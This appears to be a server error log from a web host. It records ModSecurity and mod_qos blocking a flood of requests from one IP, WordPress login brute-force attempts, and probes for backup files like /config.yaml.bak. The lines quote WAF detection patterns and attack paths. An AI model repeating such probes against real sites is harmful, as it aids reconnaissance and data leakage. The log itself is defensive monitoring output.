[Tue May 26 19:55:11.316646 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXiQAAAHs"]
[Tue May 26 19:55:11.319737 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QaQAAAgo"]
[Tue May 26 19:55:11.331367 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QZwAAAec"]
[Tue May 26 19:55:11.338790 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRWDRMqfxdEDkoszXjgAAAAg"]
[Tue May 26 19:55:11.397478 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRmDRMqfxdEDkoszXsgAAAAI"]
[Tue May 26 19:55:11.400598 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRmDRMqfxdEDkoszXtgAAACs"]
[Tue May 26 19:55:11.403261 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QswAAAgc"]
[Tue May 26 19:55:11.403575 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRmDRMqfxdEDkoszXuwAAAGo"]
[Tue May 26 19:55:11.405359 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRmDRMqfxdEDkoszXuAAAAGw"]
[Tue May 26 19:55:11.410802 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRmDRMqfxdEDkoszXvAAAAEA"]
[Tue May 26 19:55:11.415153 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszX1wAAAG0"]
[Tue May 26 19:55:11.419523 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszX1gAAAHY"]
[Tue May 26 19:55:11.430993 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRmDRMqfxdEDkoszXugAAAC8"]
[Tue May 26 19:55:11.435249 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRUqK9k_ZUB2Vp25QZgAAAgk"]
[Tue May 26 19:55:11.451075 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRmDRMqfxdEDkoszXuQAAAE8"]
[Tue May 26 19:55:11.451549 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QugAAAcY"]
[Tue May 26 19:55:11.455011 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszX0wAAACA"]
[Tue May 26 19:55:11.458822 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtRmDRMqfxdEDkoszXtwAAADA"]
[Tue May 26 19:55:11.465324 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszXzAAAAE4"]
[Tue May 26 19:55:11.468217 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszXzgAAAGE"]
[Tue May 26 19:55:11.482759 2026] [security2:error] [pid 93576:tid 93700] [remote 213.171.208.232:47370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWtR2DRMqfxdEDkoszYJQAAMXY"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:55:11.571368 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR0qK9k_ZUB2Vp25RCQAAAgg
[Tue May 26 19:55:11.575905 2026] [qos:error] [pid 93868:tid 94306] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtR0qK9k_ZUB2Vp25RDQAAAb8
[Tue May 26 19:55:11.599651 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25RDwAAAeI
[Tue May 26 19:55:11.600246 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25REAAAAd4
[Tue May 26 19:55:11.604730 2026] [qos:error] [pid 93868:tid 94305] [client 45.148.10.120:43412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25REQAAAb4
[Tue May 26 19:55:11.605685 2026] [qos:error] [pid 93868:tid 94311] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25REgAAAcQ
[Tue May 26 19:55:11.640441 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:43426] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR2DRMqfxdEDkoszYOwAAAE0
[Tue May 26 19:55:11.642527 2026] [qos:error] [pid 93868:tid 94365] [client 45.148.10.120:48966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25REwAAAfo
[Tue May 26 19:55:11.649974 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR2DRMqfxdEDkoszYPAAAAAs
[Tue May 26 19:55:11.654154 2026] [qos:error] [pid 93868:tid 94270] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25RFAAAAZs
[Tue May 26 19:55:11.721271 2026] [qos:error] [pid 93868:tid 94332] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25RFgAAAdk
[Tue May 26 19:55:11.728730 2026] [qos:error] [pid 93868:tid 94314] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtR0qK9k_ZUB2Vp25RFwAAAcc
[Tue May 26 19:55:11.826671 2026] [security2:error] [pid 93576:tid 93757] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config.yaml.bak"] [unique_id "ahWtR2DRMqfxdEDkoszYQgAAAC0"]
[Tue May 26 19:55:12.079861 2026] [qos:error] [pid 93868:tid 94322] [client 45.148.10.120:49092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RHAAAAc8
[Tue May 26 19:55:12.083072 2026] [qos:error] [pid 93868:tid 94380] [client 45.148.10.120:49118] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RHQAAAgk
[Tue May 26 19:55:12.084001 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:43426] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYRgAAAGE
[Tue May 26 19:55:12.086336 2026] [qos:error] [pid 93868:tid 94327] [client 45.148.10.120:49014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RHgAAAdQ
[Tue May 26 19:55:12.087741 2026] [qos:error] [pid 93868:tid 94363] [client 45.148.10.120:48966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RHwAAAfg
[Tue May 26 19:55:12.088715 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:43412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RIAAAAaQ
[Tue May 26 19:55:12.090060 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:49026] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RIQAAAbM
[Tue May 26 19:55:12.093284 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:49408] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RIgAAAcY
[Tue May 26 19:55:12.094250 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:43380] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSGDRMqfxdEDkoszYRwAAADE
[Tue May 26 19:55:12.095304 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:49068] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtSEqK9k_ZUB2Vp25RIwAAAdA
[Tue May 26 19:55:12.276897 2026] [security2:error] [pid 93868:tid 94351] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QuAAAAew"]
[Tue May 26 19:55:12.278096 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszX-AAAADs"]
[Tue May 26 19:55:12.283969 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszX0AAAAAM"]
[Tue May 26 19:55:12.286987 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszX9QAAABI"]
[Tue May 26 19:55:12.296078 2026] [security2:error] [pid 93868:tid 94266] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QtQAAAZc"]
[Tue May 26 19:55:12.309178 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszX-QAAAC4"]
[Tue May 26 19:55:12.309817 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QwQAAAfw"]
[Tue May 26 19:55:12.314243 2026] [security2:error] [pid 93868:tid 94319] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QuwAAAcw"]
[Tue May 26 19:55:12.314405 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QtgAAAeg"]
[Tue May 26 19:55:12.332878 2026] [security2:error] [pid 93576:tid 93731] [client 185.177.72.53:42764] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/public/index.bak"] [unique_id "ahWtSGDRMqfxdEDkoszYVQAAABM"]
[Tue May 26 19:55:12.335325 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtSGDRMqfxdEDkoszYVwAAAF4
[Tue May 26 19:55:12.341714 2026] [security2:error] [pid 93868:tid 94370] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QtwAAAf8"]
[Tue May 26 19:55:12.353191 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszX-gAAAEg"]
[Tue May 26 19:55:12.355162 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QuQAAAZw"]
[Tue May 26 19:55:12.362891 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYBgAAAFg"]
[Tue May 26 19:55:12.365822 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QtAAAAe4"]
[Tue May 26 19:55:12.367517 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYCQAAABY"]
[Tue May 26 19:55:12.376910 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q3AAAAaM"]
[Tue May 26 19:55:12.378910 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYCAAAAFE"]
[Tue May 26 19:55:12.379259 2026] [security2:error] [pid 93868:tid 94292] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q2AAAAbE"]
[Tue May 26 19:55:12.383554 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYBwAAACg"]
[Tue May 26 19:55:12.384938 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYDQAAAEU"]
[Tue May 26 19:55:12.393569 2026] [security2:error] [pid 93576:tid 93805] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYIgAAAF0"]
[Tue May 26 19:55:12.403074 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYAAAAAAE"]
[Tue May 26 19:55:12.407798 2026] [security2:error] [pid 93868:tid 94348] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25QvwAAAek"]
[Tue May 26 19:55:12.416605 2026] [security2:error] [pid 93868:tid 94340] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q3wAAAeE"]
[Tue May 26 19:55:12.417447 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYIQAAADM"]
[Tue May 26 19:55:12.433641 2026] [security2:error] [pid 93576:tid 93728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYCgAAABA"]
[Tue May 26 19:55:12.438861 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYJAAAAHs"]
[Tue May 26 19:55:12.445269 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYIAAAAF8"]
[Tue May 26 19:55:12.447288 2026] [security2:error] [pid 93576:tid 93824] [client 113.160.132.26:11658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 26.132.160.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWtSGDRMqfxdEDkoszYSQAAAHA"], referer: https://anujtradingco.com/wp-login.php?action=register
[Tue May 26 19:55:12.452766 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYLgAAAGo"]
[Tue May 26 19:55:12.453776 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR2DRMqfxdEDkoszYIwAAAEM"]
[Tue May 26 19:55:12.456346 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtR0qK9k_ZUB2Vp25Q7wAAAZQ"]
